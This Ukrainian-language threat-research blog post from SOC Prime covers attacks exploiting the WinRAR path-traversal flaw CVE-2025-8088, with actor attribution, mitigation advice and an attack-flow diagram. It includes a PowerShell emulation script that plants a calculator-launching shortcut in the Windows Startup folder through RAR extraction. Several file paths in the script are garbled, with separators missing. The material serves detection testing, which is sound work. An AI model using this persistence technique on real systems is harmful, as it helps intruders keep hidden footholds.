SOC Prime Bias: Критичний

28 Jan 2026 16:07
newspaper icon Блог Google Cloud

CVE-2025-8088: Різноманітні зловмисники експлуатують критичну вразливість WinRAR

Author Photo
Ruslan Mikhalov Chief of Threat Research at SOC Prime linkedin icon Стежити
CVE-2025-8088: Різноманітні зловмисники експлуатують критичну вразливість WinRAR
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query


Резюме

Група загрозної розвідки Google повідомляє про широке використання вразливості CVE-2025-8088, яка представляє собою високосерйозну уразливість WinRAR для обходу шляху. Зловмисники використовують її для розміщення шкідливих файлів у папку автозавантаження Windows для отримання стійкості. Як групи, які спонсоруються державою, так і фінансово мотивовані групи використовують цю експлуатацію для доставки RAT, завантажувачів та подальших захищених навантажень. У звіті надано індикатори, а також керівництво щодо виявлення та пом’якшення наслідків.

Розслідування

Дослідники пов’язали кілька акторів — UNC4895, APT44, Turla, а також групу з КНР — з архівами RAR, що застосовують альтернативні потоки даних (ADS) для розміщення файлів LNK, HTA або BAT у папку автозавантаження. Деякі архіви містили керуючі файли LNK, які запускають HTA або BAT під час входу в систему. Набори шкідливих програм, які спостерігалися, включають NESTPACKER, POISONIVY, XWorm і AsyncRAT. Спільна інфраструктура та повторно використаний код експлойта з’явилися в кампаніях, спрямованих на Україну та інші регіони.

Пом’якшення

Оновіть WinRAR до версії 7.13+ та змусьте список дозволених додатків. Зменште вплив ADS, де це можливо, та контролюйте папку автозавантаження на наявність нових файлів LNK, HTA, BAT або скриптів. Застосуйте контроль безпеки Google Safe Browsing та електронної пошти, щоб зупинити небезпечні архіви на ранніх етапах.

Реагування

Обмежте створення файлів шляху автозавантаження, пов’язаних з витягуванням RAR, особливо ярликів і скриптів. Корелюйте попередження з відомими іменами файлів і хешами, ставте під карантин уражені хости, підтверджуйте тип шкідливого ПЗ та усувайте стійкість до автозавантаження під час реагування на інциденти.

graph TB %% Class definitions classDef technique fill:#99ccff classDef file fill:#ffcc99 classDef process fill:#ccffcc classDef tool fill:#cccccc %% Node definitions tech_phishing[“<b>Техніка</b> – <b>T1566.001 Широкоформатний фішинг (Spearphishing Attachment)</b><br/>Зловмисник надсилає таргетований лист з шкідливим RAR-архівом”] class tech_phishing technique file_rar[“<b>Файл</b> – <b>Назва</b>: malicious.rar<br/>Містить підроблений PDF та ADS payload”] class file_rar file tech_user_exec[“<b>Техніка</b> – <b>T1204.002 Виконання користувачем</b><br/>Жертва відкриває RAR, що призводить до розпакування”] class tech_user_exec technique file_ads[“<b>Файл</b> – <b>Тип</b>: Alternate Data Stream (ADS)<br/>Payload: innocuous.pdf:malicious.lnk”] class file_ads file tech_exploit[“<b>Техніка</b> – <b>T1203 Використання вразливості для виконання на клієнті</b><br/>Використовує CVE-2025-8088 path traversal для запису .lnk”] class tech_exploit technique file_lnk[“<b>Файл</b> – <b>Назва</b>: malicious.lnk<br/>Розміщений у папці автозавантаження Windows”] class file_lnk file tech_persistence[“<b>Техніка</b> – <b>T1547.009 Модифікація ярлика</b><br/>Ярлик у автозавантаженні забезпечує стійкість”] class tech_persistence technique tech_cmd[“<b>Техніка</b> – <b>T1059.003 Командний рядок</b><br/>Batch або .cmd скрипти завантажують додаткові payload-и”] class tech_cmd technique tool_ratrat[“<b>Інструмент</b> – <b>Назва</b>: XWorm / AsyncRAT<br/>Троян віддаленого доступу”] class tool_ratrat tool tech_mshta[“<b>Техніка</b> – <b>T1218.005 Виконання через Mshta Proxy</b><br/>HTA файли запускаються через mshta.exe”] class tech_mshta technique file_hta[“<b>Файл</b> – <b>Назва</b>: payload.hta<br/>Виконується через mshta”] class file_hta file process_mshta[“<b>Процес</b> – <b>Назва</b>: mshta.exe<br/>Виконує HTA файл”] class process_mshta process %% Connections showing attack flow tech_phishing –>|доставляє| file_rar file_rar –>|розпаковується через| tech_user_exec tech_user_exec –>|створює| file_ads file_ads –>|використовується| tech_exploit tech_exploit –>|записує| file_lnk file_lnk –>|забезпечує| tech_persistence tech_persistence –>|тригерить| tech_cmd tech_cmd –>|завантажує| tool_ratrat tech_cmd –>|скидає| file_hta tech_cmd –>|запускає| tech_mshta tech_mshta –>|виконує| file_hta file_hta –>|запускає| process_mshta process_mshta –>|виконує| tech_mshta

Потік атаки

Виконання імітації

Попередня умова: Телеметрія та перевірка передпольотної бази повинні бути успішними.

Мотив: Цей розділ описує точне виконання техніки супротивника (TTP), розробленої для активації правила виявлення. Команди та наратив повинні прямо відображати виявлені TTP та націлені на генерування точних даних телеметрії, очікуваної логікою виявлення.

  • Наратив атаки та команди:
    Зловмисник створює шкідливий архів RAR, який містить ярлик Windows (shkidliviy.lnk) як альтернативний потік даних, прикріплений до нешкідливого на вигляд PDF (незазначений.pdf). Використовуючи CVE‑2025‑8088, зловмисник знає, що WinRAR розпакує ADS безпосередньо в цільовий шлях, не обробляючи ім’я потоку. Архів доставляється до машини жертви (наприклад, через фішинг). Потім зловмисник запускає WinRAR в тихому режимі, щоб витягти корисне навантаження прямо в папку автозавантаження поточного користувача, досягаючи стійкості.

    1. Створити шкідливе завантаження LNK (ярлик, який запускає cmd.exe /c calc.exe).
    2. Прикрепіть LNK як ADS до незазначений.pdf всередині RAR.
    3. Доставити RAR жертві.
    4. Виконати витяг WinRAR до каталогу автозавантаження.

  • Сценарій регресійного тесту:

    # --------------------------------------------------------------
# Сценарій PowerShell для імітації стійкого LNK-ADS під CVE-2025-8088
# --------------------------------------------------------------

# 1. Перемінні
$tempDir      = "$env:TEMPLNK_ADS_Test"
$pdfPath      = "$tempDirinnocuous.pdf"
$lnkPath      = "$tempDirmalicious.lnk"
$rarPath      = "$tempDirmalicious.rar"
$startupPath  = "$env:APPDATAMicrosoftWindowsStart MenuProgramsStartup"

# Забезпечити чисте робоче середовище
Remove-Item -Recurse -Force $tempDir -ErrorAction SilentlyContinue
New-Item -ItemType Directory -Path $tempDir | Out-Null

# 2. Створити фіктивний PDF (порожній файл працює для демонстрації ADS)
New-Item -ItemType File -Path $pdfPath | Out-Null

# 3. Створити шкідливий LNK, який показує на калькулятор
$ws = New-Object -ComObject WScript.Shell
$shortcut = $ws.CreateShortcut($lnkPath)
$shortcut.TargetPath = "calc.exe"
$shortcut.WindowStyle = 1
$shortcut.Save()

# 4. Упакуйте PDF і прикріпіть LNK як ADS за допомогою WinRAR CLI
#    Синтаксис створює ADS з назвою "malicious.lnk", прикріпленою до PDF.
& "C:Program FilesWinRARWinRAR.exe" a -df $rarPath $pdfPath "$lnkPath:malicious.lnk"

# 5. Витягніть RAR безпосередньо в папку автозавантаження (тихий режим)
& "C:Program FilesWinRARWinRAR.exe" x -inul $rarPath $startupPath

# 6. Перевірте, що LNK тепер є в автозавантаженні (буде видно як звичайний .lnk)
$extractedLnk = Join-Path $startupPath "malicious.lnk"
if (Test-Path $extractedLnk) {
    Write-Host "[+] Зловмисний ярлик розгорнуто до автозавантаження: $extractedLnk"
} else {
    Write-Error "[-] Ярлик не знайдено – витяг, можливо, провалився."
}

# --------------------------------------------------------------
# Кінець сценарію
# --------------------------------------------------------------

  • Команди очищення:

    # Видалити шкідливий ярлик з автозавантаження
$lnk = "$env:APPDATAMicrosoftWindowsStart MenuProgramsStartupmalicious.lnk"
if (Test-Path $lnk) { Remove-Item -Force $lnk }

# Видалити тимчасові файли та каталоги
$temp = "$env:TEMPLNK_ADS_Test"
if (Test-Path $temp) { Remove-Item -Recurse -Force $temp }

Кінець звіту

Приєднуйтесь до платформи Detection as Code від SOC Prime щоб покращити видимість загроз, найбільш актуальних для вашого бізнесу. Щоб допомогти вам почати і забезпечити негайну користь, заплануйте зустріч з експертами SOC Prime.

Приєднатися безкоштовно